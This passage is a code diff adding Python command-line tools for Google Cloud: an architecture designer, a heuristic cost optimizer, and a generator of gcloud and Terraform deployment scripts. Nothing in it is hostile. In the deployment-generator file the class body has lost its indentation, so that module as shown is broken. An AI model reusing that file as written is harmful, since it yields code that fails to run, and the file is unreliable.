            'Set up Cloud Armor WAF rules',
            'Configure Secret Manager for credentials',
            'Enable Security Command Center',
        ]),
        ('Monitoring', [
            'Create Cloud Monitoring dashboards',
            'Set up alerting policies for critical metrics',
            'Configure notification channels (email, Slack, PagerDuty)',
            'Enable Cloud Trace for distributed tracing',
            'Set up log-based metrics and log sinks',
        ]),
        ('CI/CD', [
            'Set up Cloud Build triggers',
            'Configure automated testing',
            'Implement canary or rolling deployments',
            'Set up rollback procedures',
            'Document deployment process',
        ]),
    ]
    return [{'phase': name, 'tasks': tasks} for name, tasks in phases]
def main():
    """CLI entry point: parse arguments, run the designer, emit the design."""
    cli = argparse.ArgumentParser(
        description='GCP Architecture Designer - Recommends GCP services based on workload requirements'
    )
    cli.add_argument('--input', '-i', type=str,
                     help='Path to JSON file with application requirements')
    cli.add_argument('--output', '-o', type=str,
                     help='Path to write design output JSON')
    cli.add_argument('--json', action='store_true',
                     help='Output as JSON format')
    cli.add_argument('--app-type', type=str,
                     choices=['web_application', 'mobile_backend', 'data_pipeline',
                              'microservices', 'saas_platform', 'ml_platform'],
                     default='web_application',
                     help='Application type (default: web_application)')
    cli.add_argument('--users', type=int, default=1000,
                     help='Expected number of users (default: 1000)')
    cli.add_argument('--budget', type=float, default=500,
                     help='Monthly budget in USD (default: 500)')
    opts = cli.parse_args()

    if opts.input:
        # Requirements come from a JSON file; unreadable input is fatal.
        try:
            with open(opts.input, 'r') as fh:
                requirements = json.load(fh)
        except FileNotFoundError:
            print(f"Error: File '{opts.input}' not found.", file=sys.stderr)
            sys.exit(1)
        except json.JSONDecodeError:
            print(f"Error: File '{opts.input}' is not valid JSON.", file=sys.stderr)
            sys.exit(1)
    else:
        # No file given: synthesize requirements from CLI flags.
        requirements = {
            'application_type': opts.app_type,
            'expected_users': opts.users,
            'budget_monthly_usd': opts.budget
        }

    designer = ArchitectureDesigner(requirements)
    design = designer.recommend_architecture_pattern()
    output = {
        'architecture': design,
        'implementation_checklist': designer.generate_service_checklist()
    }

    if opts.output:
        with open(opts.output, 'w') as fh:
            json.dump(output, fh, indent=2)
        print(f"Design written to {opts.output}")
    elif opts.json:
        print(json.dumps(output, indent=2))
    else:
        # Human-readable summary on stdout.
        print(f"\nRecommended Pattern: {design['pattern_name']}")
        print(f"Description: {design['description']}")
        print(f"Use Case: {design['use_case']}")
        print(f"\nServices:")
        for svc_name, svc in design['services'].items():
            print(f"  - {svc_name}: {svc['service']} ({svc['purpose']})")
        print(f"\nEstimated Monthly Cost: ${design['estimated_cost']['monthly_usd']:.2f}")
        print(f"\nPros: {', '.join(design['pros'])}")
        print(f"Cons: {', '.join(design['cons'])}")


if __name__ == '__main__':
    main()

View File

@@ -0,0 +1,465 @@
"""
GCP cost optimization analyzer.
Provides cost-saving recommendations for GCP resources.
"""
import argparse
import json
import sys
from typing import Dict, List, Any
class CostOptimizer:
    """Analyze GCP costs and provide optimization recommendations.

    Each _analyze_* method inspects one slice of the resource inventory,
    appends recommendation dicts (service/type/issue/recommendation/
    potential_savings/priority) to self.recommendations as a side effect,
    and returns its estimated monthly savings in USD. All dollar figures
    are rough heuristics, not billing-accurate numbers.
    """

    def __init__(self, current_resources: Dict[str, Any], monthly_spend: float):
        """
        Initialize with current GCP resources and spending.
        Args:
            current_resources: Dictionary of current GCP resources
            monthly_spend: Current monthly GCP spend in USD
        """
        self.resources = current_resources
        self.monthly_spend = monthly_spend
        # Rebuilt on every analyze_and_optimize() call.
        self.recommendations = []

    def analyze_and_optimize(self) -> Dict[str, Any]:
        """
        Analyze current setup and generate cost optimization recommendations.
        Returns:
            Dictionary with recommendations and potential savings
        """
        self.recommendations = []
        potential_savings = 0.0
        # Each analyzer appends to self.recommendations and returns savings.
        compute_savings = self._analyze_compute()
        potential_savings += compute_savings
        storage_savings = self._analyze_storage()
        potential_savings += storage_savings
        database_savings = self._analyze_database()
        potential_savings += database_savings
        network_savings = self._analyze_networking()
        potential_savings += network_savings
        general_savings = self._analyze_general_optimizations()
        potential_savings += general_savings
        # NOTE(review): savings heuristics are independent of monthly_spend,
        # so optimized_monthly_spend can go negative for small spends.
        return {
            'current_monthly_spend': self.monthly_spend,
            'potential_monthly_savings': round(potential_savings, 2),
            'optimized_monthly_spend': round(self.monthly_spend - potential_savings, 2),
            'savings_percentage': round((potential_savings / self.monthly_spend) * 100, 2) if self.monthly_spend > 0 else 0,
            'recommendations': self.recommendations,
            'priority_actions': self._prioritize_recommendations()
        }

    def _analyze_compute(self) -> float:
        """Analyze compute resources (GCE, GKE, Cloud Run)."""
        savings = 0.0
        gce_instances = self.resources.get('gce_instances', [])
        if gce_instances:
            # Idle instances: <10% CPU utilization, ~$50/month each assumed.
            idle_count = sum(1 for inst in gce_instances if inst.get('cpu_utilization', 100) < 10)
            if idle_count > 0:
                idle_cost = idle_count * 50
                savings += idle_cost
                self.recommendations.append({
                    'service': 'Compute Engine',
                    'type': 'Idle Resources',
                    'issue': f'{idle_count} GCE instances with <10% CPU utilization',
                    'recommendation': 'Stop or delete idle instances, or downsize to smaller machine types',
                    'potential_savings': idle_cost,
                    'priority': 'high'
                })
            # Check for committed use discounts
            on_demand_count = sum(1 for inst in gce_instances if inst.get('pricing', 'on-demand') == 'on-demand')
            if on_demand_count >= 2:
                cud_savings = on_demand_count * 50 * 0.37  # 37% savings with 1-yr CUD
                savings += cud_savings
                self.recommendations.append({
                    'service': 'Compute Engine',
                    'type': 'Committed Use Discounts',
                    'issue': f'{on_demand_count} instances on on-demand pricing',
                    'recommendation': 'Purchase 1-year committed use discounts for predictable workloads (37% savings) or 3-year (55% savings)',
                    'potential_savings': cud_savings,
                    'priority': 'medium'
                })
            # Check for sustained use discounts awareness
            short_lived = sum(1 for inst in gce_instances if inst.get('uptime_hours_month', 730) < 200)
            if short_lived > 0:
                self.recommendations.append({
                    'service': 'Compute Engine',
                    'type': 'Scheduling',
                    'issue': f'{short_lived} instances running <200 hours/month',
                    'recommendation': 'Use Instance Scheduler to stop dev/test instances outside business hours',
                    'potential_savings': short_lived * 20,
                    'priority': 'medium'
                })
                savings += short_lived * 20
        # GKE optimization
        gke_clusters = self.resources.get('gke_clusters', [])
        for cluster in gke_clusters:
            if cluster.get('mode', 'standard') == 'standard':
                node_utilization = cluster.get('avg_node_utilization', 100)
                if node_utilization < 40:
                    # Assume ~30% of cluster cost recoverable via Autopilot.
                    autopilot_savings = cluster.get('monthly_cost', 500) * 0.30
                    savings += autopilot_savings
                    self.recommendations.append({
                        'service': 'GKE',
                        'type': 'Cluster Mode',
                        'issue': f'Standard GKE cluster with <40% node utilization',
                        'recommendation': 'Migrate to GKE Autopilot to pay only for pod resources, or enable cluster autoscaler',
                        'potential_savings': autopilot_savings,
                        'priority': 'high'
                    })
        # Cloud Run optimization
        cloud_run_services = self.resources.get('cloud_run_services', [])
        for svc in cloud_run_services:
            # Warm min-instances are wasted when traffic is near zero.
            if svc.get('min_instances', 0) > 0 and svc.get('avg_rps', 100) < 1:
                min_inst_savings = svc.get('min_instances', 1) * 15
                savings += min_inst_savings
                self.recommendations.append({
                    'service': 'Cloud Run',
                    'type': 'Min Instances',
                    'issue': f'Service {svc.get("name", "unknown")} has min instances but very low traffic',
                    'recommendation': 'Set min-instances to 0 for low-traffic services to enable scale-to-zero',
                    'potential_savings': min_inst_savings,
                    'priority': 'medium'
                })
        return savings

    def _analyze_storage(self) -> float:
        """Analyze Cloud Storage resources."""
        savings = 0.0
        gcs_buckets = self.resources.get('gcs_buckets', [])
        for bucket in gcs_buckets:
            size_gb = bucket.get('size_gb', 0)
            storage_class = bucket.get('storage_class', 'STANDARD')
            # Large buckets without lifecycle rules keep cold data at hot rates.
            if not bucket.get('has_lifecycle_policy', False) and size_gb > 100:
                lifecycle_savings = size_gb * 0.012
                savings += lifecycle_savings
                self.recommendations.append({
                    'service': 'Cloud Storage',
                    'type': 'Lifecycle Policy',
                    'issue': f'Bucket {bucket.get("name", "unknown")} ({size_gb} GB) has no lifecycle policy',
                    'recommendation': 'Add lifecycle rule: Transition to Nearline after 30 days, Coldline after 90 days, Archive after 365 days',
                    'potential_savings': lifecycle_savings,
                    'priority': 'medium'
                })
            if storage_class == 'STANDARD' and size_gb > 500:
                class_savings = size_gb * 0.006
                savings += class_savings
                self.recommendations.append({
                    'service': 'Cloud Storage',
                    'type': 'Storage Class',
                    'issue': f'Large bucket ({size_gb} GB) using Standard class',
                    'recommendation': 'Enable Autoclass for automatic storage class management based on access patterns',
                    'potential_savings': class_savings,
                    'priority': 'high'
                })
        return savings

    def _analyze_database(self) -> float:
        """Analyze Cloud SQL, Firestore, and BigQuery costs."""
        savings = 0.0
        cloud_sql_instances = self.resources.get('cloud_sql_instances', [])
        for db in cloud_sql_instances:
            # Nearly unused databases: assume ~80% of their cost recoverable.
            if db.get('connections_per_day', 1000) < 10:
                db_cost = db.get('monthly_cost', 100)
                savings += db_cost * 0.8
                self.recommendations.append({
                    'service': 'Cloud SQL',
                    'type': 'Idle Resource',
                    'issue': f'Database {db.get("name", "unknown")} has <10 connections/day',
                    'recommendation': 'Stop database if not needed, or take a backup and delete',
                    'potential_savings': db_cost * 0.8,
                    'priority': 'high'
                })
            # Under-utilized non-HA instances are right-sizing candidates.
            if db.get('utilization', 100) < 30 and not db.get('has_ha', False):
                rightsize_savings = db.get('monthly_cost', 200) * 0.35
                savings += rightsize_savings
                self.recommendations.append({
                    'service': 'Cloud SQL',
                    'type': 'Right-sizing',
                    'issue': f'Cloud SQL instance {db.get("name", "unknown")} has low utilization (<30%)',
                    'recommendation': 'Downsize to a smaller machine type (e.g., db-custom-2-8192 to db-f1-micro for dev)',
                    'potential_savings': rightsize_savings,
                    'priority': 'medium'
                })
        # BigQuery optimization
        bigquery_datasets = self.resources.get('bigquery_datasets', [])
        for dataset in bigquery_datasets:
            if dataset.get('pricing_model', 'on_demand') == 'on_demand':
                monthly_tb_scanned = dataset.get('monthly_tb_scanned', 0)
                if monthly_tb_scanned > 10:
                    # On-demand is $6.25/TB; slots assumed ~30% cheaper at volume.
                    slot_savings = (monthly_tb_scanned * 6.25) * 0.30
                    savings += slot_savings
                    self.recommendations.append({
                        'service': 'BigQuery',
                        'type': 'Pricing Model',
                        'issue': f'Scanning {monthly_tb_scanned} TB/month on on-demand pricing',
                        'recommendation': 'Switch to BigQuery editions with slots for predictable costs (30%+ savings at this volume)',
                        'potential_savings': slot_savings,
                        'priority': 'high'
                    })
            if not dataset.get('has_partitioning', False):
                partition_savings = dataset.get('monthly_query_cost', 50) * 0.50
                savings += partition_savings
                self.recommendations.append({
                    'service': 'BigQuery',
                    'type': 'Table Partitioning',
                    'issue': f'Tables in {dataset.get("name", "unknown")} lack partitioning',
                    'recommendation': 'Partition tables by date and add clustering columns to reduce bytes scanned',
                    'potential_savings': partition_savings,
                    'priority': 'medium'
                })
        return savings

    def _analyze_networking(self) -> float:
        """Analyze networking costs (egress, Cloud NAT, etc.)."""
        savings = 0.0
        cloud_nat_gateways = self.resources.get('cloud_nat_gateways', [])
        # Each NAT gateway beyond the first is assumed ~$45/month of overhead.
        if len(cloud_nat_gateways) > 1:
            extra_nats = len(cloud_nat_gateways) - 1
            nat_savings = extra_nats * 45
            savings += nat_savings
            self.recommendations.append({
                'service': 'Cloud NAT',
                'type': 'Resource Consolidation',
                'issue': f'{len(cloud_nat_gateways)} Cloud NAT gateways deployed',
                'recommendation': 'Consolidate NAT gateways in dev/staging, or use Private Google Access for GCP services',
                'potential_savings': nat_savings,
                'priority': 'high'
            })
        egress_gb = self.resources.get('monthly_egress_gb', 0)
        if egress_gb > 1000:
            cdn_savings = egress_gb * 0.04  # CDN is cheaper than direct egress
            savings += cdn_savings
            self.recommendations.append({
                'service': 'Networking',
                'type': 'CDN Optimization',
                'issue': f'High egress volume ({egress_gb} GB/month)',
                'recommendation': 'Enable Cloud CDN to serve cached content at lower egress rates',
                'potential_savings': cdn_savings,
                'priority': 'medium'
            })
        return savings

    def _analyze_general_optimizations(self) -> float:
        """General GCP cost optimizations."""
        savings = 0.0
        # Log retention
        log_sinks = self.resources.get('log_sinks', [])
        if not log_sinks:
            log_volume_gb = self.resources.get('monthly_log_volume_gb', 0)
            if log_volume_gb > 50:
                # Assume ~60% of $0.50/GB ingestion cost avoidable via exclusions.
                log_savings = log_volume_gb * 0.50 * 0.6
                savings += log_savings
                self.recommendations.append({
                    'service': 'Cloud Logging',
                    'type': 'Log Exclusion',
                    'issue': f'{log_volume_gb} GB/month of logs without exclusion filters',
                    'recommendation': 'Create log exclusion filters for verbose/debug logs and route remaining to Cloud Storage via log sinks',
                    'potential_savings': log_savings,
                    'priority': 'medium'
                })
        # Unattached persistent disks
        persistent_disks = self.resources.get('persistent_disks', [])
        unattached = sum(1 for disk in persistent_disks if not disk.get('attached', True))
        if unattached > 0:
            disk_savings = unattached * 10  # ~$10/month per 100 GB disk
            savings += disk_savings
            self.recommendations.append({
                'service': 'Compute Engine',
                'type': 'Unused Resources',
                'issue': f'{unattached} unattached persistent disks',
                'recommendation': 'Snapshot and delete unused persistent disks',
                'potential_savings': disk_savings,
                'priority': 'high'
            })
        # Static external IPs
        static_ips = self.resources.get('static_ips', [])
        unused_ips = sum(1 for ip in static_ips if not ip.get('in_use', True))
        if unused_ips > 0:
            ip_savings = unused_ips * 7.30  # $0.01/hour = $7.30/month
            savings += ip_savings
            self.recommendations.append({
                'service': 'Networking',
                'type': 'Unused Resources',
                'issue': f'{unused_ips} unused static external IP addresses',
                'recommendation': 'Release unused static IPs to avoid hourly charges',
                'potential_savings': ip_savings,
                'priority': 'high'
            })
        # Budget alerts
        if not self.resources.get('has_budget_alerts', False):
            self.recommendations.append({
                'service': 'Cloud Billing',
                'type': 'Cost Monitoring',
                'issue': 'No budget alerts configured',
                'recommendation': 'Set up Cloud Billing budgets with alerts at 50%, 80%, 100% of monthly budget',
                'potential_savings': 0,
                'priority': 'high'
            })
        # Recommender API
        if not self.resources.get('uses_recommender', False):
            self.recommendations.append({
                'service': 'Active Assist',
                'type': 'Visibility',
                'issue': 'GCP Recommender not reviewed',
                'recommendation': 'Review Active Assist recommendations for right-sizing, idle resources, and committed use discounts',
                'potential_savings': 0,
                'priority': 'medium'
            })
        return savings

    def _prioritize_recommendations(self) -> List[Dict[str, Any]]:
        """Get top priority recommendations.

        Returns the five high-priority recommendations with the largest
        potential savings, in descending order.
        """
        high_priority = [r for r in self.recommendations if r['priority'] == 'high']
        high_priority.sort(key=lambda x: x.get('potential_savings', 0), reverse=True)
        return high_priority[:5]

    def generate_optimization_checklist(self) -> List[Dict[str, Any]]:
        """Generate actionable checklist for cost optimization.

        Returns a static, time-horizon-grouped checklist; it does not
        depend on the analyzed resources.
        """
        return [
            {
                'category': 'Immediate Actions (Today)',
                'items': [
                    'Release unused static IPs',
                    'Delete unattached persistent disks',
                    'Stop idle Compute Engine instances',
                    'Set up billing budget alerts'
                ]
            },
            {
                'category': 'This Week',
                'items': [
                    'Add Cloud Storage lifecycle policies',
                    'Create log exclusion filters for verbose logs',
                    'Right-size Cloud SQL instances',
                    'Review Active Assist recommendations'
                ]
            },
            {
                'category': 'This Month',
                'items': [
                    'Evaluate committed use discounts',
                    'Migrate GKE Standard to Autopilot where applicable',
                    'Partition and cluster BigQuery tables',
                    'Enable Cloud CDN for high-egress services'
                ]
            },
            {
                'category': 'Ongoing',
                'items': [
                    'Review billing reports weekly',
                    'Label all resources for cost allocation',
                    'Monitor Active Assist recommendations monthly',
                    'Conduct quarterly cost optimization reviews'
                ]
            }
        ]
def main():
    """CLI entry point: parse arguments, run the optimizer, emit the report."""
    cli = argparse.ArgumentParser(
        description='GCP Cost Optimizer - Analyzes GCP resources and recommends cost savings'
    )
    cli.add_argument('--resources', '-r', type=str,
                     help='Path to JSON file with current GCP resource inventory')
    cli.add_argument('--monthly-spend', '-s', type=float, default=1000,
                     help='Current monthly GCP spend in USD (default: 1000)')
    cli.add_argument('--output', '-o', type=str,
                     help='Path to write optimization report JSON')
    cli.add_argument('--json', action='store_true',
                     help='Output as JSON format')
    cli.add_argument('--checklist', action='store_true',
                     help='Generate optimization checklist')
    opts = cli.parse_args()

    if opts.resources:
        # Inventory comes from a JSON file; unreadable input is fatal.
        try:
            with open(opts.resources, 'r') as fh:
                inventory = json.load(fh)
        except FileNotFoundError:
            print(f"Error: File '{opts.resources}' not found.", file=sys.stderr)
            sys.exit(1)
        except json.JSONDecodeError:
            print(f"Error: File '{opts.resources}' is not valid JSON.", file=sys.stderr)
            sys.exit(1)
    else:
        # No inventory: run with an empty resource set (generic advice only).
        inventory = {}

    optimizer = CostOptimizer(inventory, opts.monthly_spend)
    report = optimizer.analyze_and_optimize()
    if opts.checklist:
        report['checklist'] = optimizer.generate_optimization_checklist()

    if opts.output:
        with open(opts.output, 'w') as fh:
            json.dump(report, fh, indent=2)
        print(f"Report written to {opts.output}")
    elif opts.json:
        print(json.dumps(report, indent=2))
    else:
        # Human-readable summary on stdout.
        print(f"\nGCP Cost Optimization Report")
        print(f"{'=' * 40}")
        print(f"Current Monthly Spend: ${report['current_monthly_spend']:.2f}")
        print(f"Potential Savings: ${report['potential_monthly_savings']:.2f}")
        print(f"Optimized Spend: ${report['optimized_monthly_spend']:.2f}")
        print(f"Savings Percentage: {report['savings_percentage']}%")
        print(f"\nTop Priority Actions:")
        for idx, action in enumerate(report['priority_actions'], 1):
            print(f"  {idx}. [{action['service']}] {action['recommendation']}")
            print(f"     Savings: ${action['potential_savings']:.2f}/month")
        print(f"\nTotal Recommendations: {len(report['recommendations'])}")


if __name__ == '__main__':
    main()

View File

@@ -0,0 +1,835 @@
"""
GCP deployment script generator.
Creates gcloud CLI scripts and Terraform configurations for GCP architectures.
"""
import argparse
import json
import sys
from typing import Dict, Any
class DeploymentManager:
"""Generate GCP deployment scripts and IaC configurations."""
def __init__(self, app_name: str, requirements: Dict[str, Any]):
    """
    Initialize with application requirements.

    Args:
        app_name: Application name (used for resource naming)
        requirements: Dictionary with pattern, region, project requirements
    """
    # Normalize to a resource-name-friendly slug: lowercase, spaces -> dashes.
    self.app_name = '-'.join(app_name.lower().split(' '))
    self.requirements = requirements
    # Common settings with sensible defaults when not supplied.
    self.region = requirements.get('region', 'us-central1')
    self.project_id = requirements.get('project_id', 'my-project')
    self.pattern = requirements.get('pattern', 'serverless_web')
def generate_gcloud_script(self) -> str:
    """
    Generate gcloud CLI deployment script.

    Returns:
        Shell script as string. Unrecognized patterns fall back to the
        serverless web script.
    """
    # Dispatch table: pattern name -> bound script generator.
    generators = {
        'serverless_web': self._gcloud_serverless_web,
        'gke_microservices': self._gcloud_gke_microservices,
        'data_pipeline': self._gcloud_data_pipeline,
    }
    builder = generators.get(self.pattern, self._gcloud_serverless_web)
    return builder()
def _gcloud_serverless_web(self) -> str:
"""Generate gcloud script for serverless web pattern."""
return f"""#!/bin/bash
# GCP Serverless Web Deployment Script
# Application: {self.app_name}
# Region: {self.region}
# Pattern: Cloud Run + Firestore + Cloud Storage + Cloud CDN
set -euo pipefail
PROJECT_ID="{self.project_id}"
REGION="{self.region}"
APP_NAME="{self.app_name}"
ENVIRONMENT="${{ENVIRONMENT:-dev}}"
echo "=== Deploying $APP_NAME to GCP ($ENVIRONMENT) ==="
# 1. Set project
gcloud config set project $PROJECT_ID
# 2. Enable required APIs
echo "Enabling required APIs..."
gcloud services enable \\
run.googleapis.com \\
firestore.googleapis.com \\
cloudbuild.googleapis.com \\
artifactregistry.googleapis.com \\
secretmanager.googleapis.com \\
compute.googleapis.com \\
monitoring.googleapis.com \\
logging.googleapis.com
# 3. Create Artifact Registry repository
echo "Creating Artifact Registry repository..."
gcloud artifacts repositories create $APP_NAME \\
--repository-format=docker \\
--location=$REGION \\
--description="Docker images for $APP_NAME" \\
|| echo "Repository already exists"
# 4. Build and push container image
echo "Building container image..."
gcloud builds submit \\
--tag $REGION-docker.pkg.dev/$PROJECT_ID/$APP_NAME/$APP_NAME:latest \\
.
# 5. Create Firestore database
echo "Creating Firestore database..."
gcloud firestore databases create \\
--location=$REGION \\
--type=firestore-native \\
|| echo "Firestore database already exists"
# 6. Create service account for Cloud Run
echo "Creating service account..."
SA_NAME="${{APP_NAME}}-run-sa"
gcloud iam service-accounts create $SA_NAME \\
--display-name="$APP_NAME Cloud Run Service Account" \\
|| echo "Service account already exists"
# Grant Firestore access
gcloud projects add-iam-policy-binding $PROJECT_ID \\
--member="serviceAccount:$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com" \\
--role="roles/datastore.user" \\
--condition=None
# Grant Secret Manager access
gcloud projects add-iam-policy-binding $PROJECT_ID \\
--member="serviceAccount:$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com" \\
--role="roles/secretmanager.secretAccessor" \\
--condition=None
# 7. Deploy Cloud Run service
echo "Deploying Cloud Run service..."
gcloud run deploy $APP_NAME-api \\
--image $REGION-docker.pkg.dev/$PROJECT_ID/$APP_NAME/$APP_NAME:latest \\
--region $REGION \\
--platform managed \\
--service-account $SA_NAME@$PROJECT_ID.iam.gserviceaccount.com \\
--memory 512Mi \\
--cpu 1 \\
--min-instances 0 \\
--max-instances 10 \\
--set-env-vars "PROJECT_ID=$PROJECT_ID,ENVIRONMENT=$ENVIRONMENT" \\
--allow-unauthenticated
# 8. Create Cloud Storage bucket for static assets
echo "Creating static assets bucket..."
BUCKET_NAME="${{PROJECT_ID}}-${{APP_NAME}}-static"
gsutil mb -l $REGION gs://$BUCKET_NAME/ || echo "Bucket already exists"
gsutil iam ch allUsers:objectViewer gs://$BUCKET_NAME
# 9. Set up Cloud Monitoring alerting
echo "Setting up monitoring..."
gcloud alpha monitoring policies create \\
--notification-channels="" \\
--display-name="$APP_NAME High Error Rate" \\
--condition-display-name="Cloud Run 5xx Error Rate" \\
--condition-filter='resource.type="cloud_run_revision" AND metric.type="run.googleapis.com/request_count" AND metric.labels.response_code_class="5xx"' \\
--condition-threshold-value=10 \\
--condition-threshold-duration=60s \\
|| echo "Alert policy creation requires additional configuration"
# 10. Output deployment info
echo ""
echo "=== Deployment Complete ==="
SERVICE_URL=$(gcloud run services describe $APP_NAME-api --region $REGION --format 'value(status.url)')
echo "Cloud Run URL: $SERVICE_URL"
echo "Static Bucket: gs://$BUCKET_NAME"
echo "Firestore: https://console.cloud.google.com/firestore?project=$PROJECT_ID"
echo "Monitoring: https://console.cloud.google.com/monitoring?project=$PROJECT_ID"
"""
def _gcloud_gke_microservices(self) -> str:
"""Generate gcloud script for GKE microservices pattern."""
return f"""#!/bin/bash
# GCP GKE Microservices Deployment Script
# Application: {self.app_name}
# Region: {self.region}
# Pattern: GKE Autopilot + Cloud SQL + Memorystore
set -euo pipefail
PROJECT_ID="{self.project_id}"
REGION="{self.region}"
APP_NAME="{self.app_name}"
ENVIRONMENT="${{ENVIRONMENT:-dev}}"
CLUSTER_NAME="${{APP_NAME}}-cluster"
NETWORK_NAME="${{APP_NAME}}-vpc"
echo "=== Deploying $APP_NAME GKE Microservices ($ENVIRONMENT) ==="
# 1. Set project
gcloud config set project $PROJECT_ID
# 2. Enable required APIs
echo "Enabling required APIs..."
gcloud services enable \\
container.googleapis.com \\
sqladmin.googleapis.com \\
redis.googleapis.com \\
cloudbuild.googleapis.com \\
artifactregistry.googleapis.com \\
secretmanager.googleapis.com \\
servicenetworking.googleapis.com \\
compute.googleapis.com
# 3. Create VPC network
echo "Creating VPC network..."
gcloud compute networks create $NETWORK_NAME \\
--subnet-mode=auto \\
|| echo "Network already exists"
# Allocate IP range for private services
gcloud compute addresses create google-managed-services-$NETWORK_NAME \\
--global \\
--purpose=VPC_PEERING \\
--prefix-length=16 \\
--network=$NETWORK_NAME \\
|| echo "IP range already exists"
gcloud services vpc-peerings connect \\
--service=servicenetworking.googleapis.com \\
--ranges=google-managed-services-$NETWORK_NAME \\
--network=$NETWORK_NAME \\
|| echo "VPC peering already exists"
# 4. Create GKE Autopilot cluster
echo "Creating GKE Autopilot cluster..."
gcloud container clusters create-auto $CLUSTER_NAME \\
--region $REGION \\
--network $NETWORK_NAME \\
--release-channel regular \\
--enable-master-authorized-networks \\
--enable-private-nodes \\
|| echo "Cluster already exists"
# 5. Get cluster credentials
gcloud container clusters get-credentials $CLUSTER_NAME --region $REGION
# 6. Create Cloud SQL instance
echo "Creating Cloud SQL instance..."
gcloud sql instances create $APP_NAME-db \\
--database-version=POSTGRES_15 \\
--tier=db-custom-2-8192 \\
--region=$REGION \\
--network=$NETWORK_NAME \\
--no-assign-ip \\
--availability-type=regional \\
--backup-start-time=02:00 \\
--storage-auto-increase \\
|| echo "Cloud SQL instance already exists"
# Create database
gcloud sql databases create $APP_NAME \\
--instance=$APP_NAME-db \\
|| echo "Database already exists"
# 7. Create Memorystore Redis instance
echo "Creating Memorystore Redis instance..."
gcloud redis instances create $APP_NAME-cache \\
--size=1 \\
--region=$REGION \\
--redis-version=redis_7_0 \\
--network=$NETWORK_NAME \\
--tier=basic \\
|| echo "Redis instance already exists"
# 8. Configure Workload Identity
echo "Configuring Workload Identity..."
SA_NAME="${{APP_NAME}}-workload"
gcloud iam service-accounts create $SA_NAME \\
--display-name="$APP_NAME Workload Identity SA" \\
|| echo "Service account already exists"
gcloud projects add-iam-policy-binding $PROJECT_ID \\
--member="serviceAccount:$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com" \\
--role="roles/cloudsql.client"
gcloud iam service-accounts add-iam-policy-binding \\
$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com \\
--role="roles/iam.workloadIdentityUser" \\
--member="serviceAccount:$PROJECT_ID.svc.id.goog[default/$SA_NAME]"
echo ""
echo "=== GKE Cluster Ready ==="
echo "Cluster: $CLUSTER_NAME"
echo "Cloud SQL: $APP_NAME-db"
echo "Redis: $APP_NAME-cache"
echo ""
echo "Next: Apply Kubernetes manifests with 'kubectl apply -f k8s/'"
"""
def _gcloud_data_pipeline(self) -> str:
"""Generate gcloud script for data pipeline pattern."""
return f"""#!/bin/bash
# GCP Data Pipeline Deployment Script
# Application: {self.app_name}
# Region: {self.region}
# Pattern: Pub/Sub + Dataflow + BigQuery
set -euo pipefail
PROJECT_ID="{self.project_id}"
REGION="{self.region}"
APP_NAME="{self.app_name}"
echo "=== Deploying $APP_NAME Data Pipeline ==="
# 1. Set project
gcloud config set project $PROJECT_ID
# 2. Enable required APIs
echo "Enabling required APIs..."
gcloud services enable \\
pubsub.googleapis.com \\
dataflow.googleapis.com \\
bigquery.googleapis.com \\
storage.googleapis.com \\
monitoring.googleapis.com
# 3. Create Pub/Sub topic and subscription
echo "Creating Pub/Sub resources..."
gcloud pubsub topics create $APP_NAME-events \\
|| echo "Topic already exists"
gcloud pubsub subscriptions create $APP_NAME-events-sub \\
--topic=$APP_NAME-events \\
--ack-deadline=60 \\
--message-retention-duration=7d \\
|| echo "Subscription already exists"
# Dead letter topic
gcloud pubsub topics create $APP_NAME-events-dlq \\
|| echo "DLQ topic already exists"
gcloud pubsub subscriptions update $APP_NAME-events-sub \\
--dead-letter-topic=$APP_NAME-events-dlq \\
--max-delivery-attempts=5
# 4. Create BigQuery dataset and table
echo "Creating BigQuery resources..."
bq mk --dataset --location=$REGION $PROJECT_ID:${{APP_NAME//-/_}}_analytics \\
|| echo "Dataset already exists"
bq mk --table \\
$PROJECT_ID:${{APP_NAME//-/_}}_analytics.events \\
event_id:STRING,event_type:STRING,payload:STRING,timestamp:TIMESTAMP,processed_at:TIMESTAMP \\
--time_partitioning_type=DAY \\
--time_partitioning_field=timestamp \\
--clustering_fields=event_type \\
|| echo "Table already exists"
# 5. Create Cloud Storage bucket for Dataflow temp/staging
echo "Creating staging bucket..."
STAGING_BUCKET="${{PROJECT_ID}}-${{APP_NAME}}-dataflow"
gsutil mb -l $REGION gs://$STAGING_BUCKET/ || echo "Bucket already exists"
# 6. Create service account for Dataflow
echo "Creating Dataflow service account..."
SA_NAME="${{APP_NAME}}-dataflow-sa"
gcloud iam service-accounts create $SA_NAME \\
--display-name="$APP_NAME Dataflow Worker SA" \\
|| echo "Service account already exists"
for ROLE in roles/dataflow.worker roles/bigquery.dataEditor roles/pubsub.subscriber roles/storage.objectAdmin; do
gcloud projects add-iam-policy-binding $PROJECT_ID \\
--member="serviceAccount:$SA_NAME@$PROJECT_ID.iam.gserviceaccount.com" \\
--role="$ROLE" \\
--condition=None
done
echo ""
echo "=== Data Pipeline Infrastructure Ready ==="
echo "Pub/Sub Topic: $APP_NAME-events"
echo "BigQuery Dataset: ${{APP_NAME//-/_}}_analytics"
echo "Staging Bucket: gs://$STAGING_BUCKET"
echo ""
echo "Next: Deploy Dataflow job with Apache Beam pipeline"
echo " python -m apache_beam.examples.streaming_wordcount \\\\"
echo " --runner DataflowRunner \\\\"
echo " --project $PROJECT_ID \\\\"
echo " --region $REGION \\\\"
echo " --temp_location gs://$STAGING_BUCKET/temp"
"""
def generate_terraform_configuration(self) -> str:
"""
Generate Terraform configuration for the selected pattern.
Returns:
Terraform HCL configuration as string
"""
if self.pattern == 'serverless_web':
return self._terraform_serverless_web()
elif self.pattern == 'gke_microservices':
return self._terraform_gke_microservices()
else:
return self._terraform_serverless_web()
def _terraform_serverless_web(self) -> str:
"""Generate Terraform for serverless web pattern."""
return f"""terraform {{
required_version = ">= 1.0"
required_providers {{
google = {{
source = "hashicorp/google"
version = "~> 5.0"
}}
}}
}}
provider "google" {{
project = var.project_id
region = var.region
}}
variable "project_id" {{
description = "GCP project ID"
type = string
}}
variable "region" {{
description = "GCP region"
type = string
default = "{self.region}"
}}
variable "environment" {{
description = "Environment name"
type = string
default = "dev"
}}
variable "app_name" {{
description = "Application name"
type = string
default = "{self.app_name}"
}}
# Enable required APIs
resource "google_project_service" "apis" {{
for_each = toset([
"run.googleapis.com",
"firestore.googleapis.com",
